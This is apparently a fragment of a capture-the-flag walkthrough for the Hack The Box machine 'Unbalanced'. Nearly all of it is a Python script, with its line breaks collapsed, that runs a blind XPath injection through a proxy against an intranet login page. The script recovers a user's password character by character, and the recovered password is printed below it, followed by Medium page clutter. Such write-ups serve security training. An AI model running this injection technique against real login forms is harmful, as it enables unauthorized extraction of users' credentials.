Unbalanced — HTB Walkthrough

#!/usr/bin/env pythonimport requestsimport stringcharacters = string.printablehttp_proxy = "http://10.10.10.200:3128"proxy_dict = {"http":http_proxy}target_url = "http://172.31.179.1/intranet.php"password = ""end = " "user_no = 3 # Change this to the user number you wantpassword_length = 0def send_request(payload):data = {"Username":"manager","Password":payload}response = requests.post(target_url,data=data,proxies=proxy_dict)return responsefor length in range(1, 101):print("\rTrying :" + str(length) + end)length_payload = "'] | //*[" + str(user_no) + "][string-length(Password) = " + str(length) + "] | /foo [bar = '"temp = send_request(length_payload)if "Invalid credentials." not in temp.text:password_length = lengthprint("\nLength of the password is : " + str(length) + "\n")breakfor i in range(1,password_length + 1):for j in characters:if j != "'":print("\rChecking position " + str(i) + " for character: " + str(j),end)payload = "']|//*[" + str(user_no) + "][substring(Password," + str(i) + ",1) = '" + str(j) + "'] | /foo [bar = '"response = send_request(payload)if "Invalid credentials." not in response.text:print("\nPasswords " + str(i) + " character is : " + str(j))password = password + str(j)breakprint("\nThe password is : " + str(password))
ireallyl0vebubblegum!!!

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store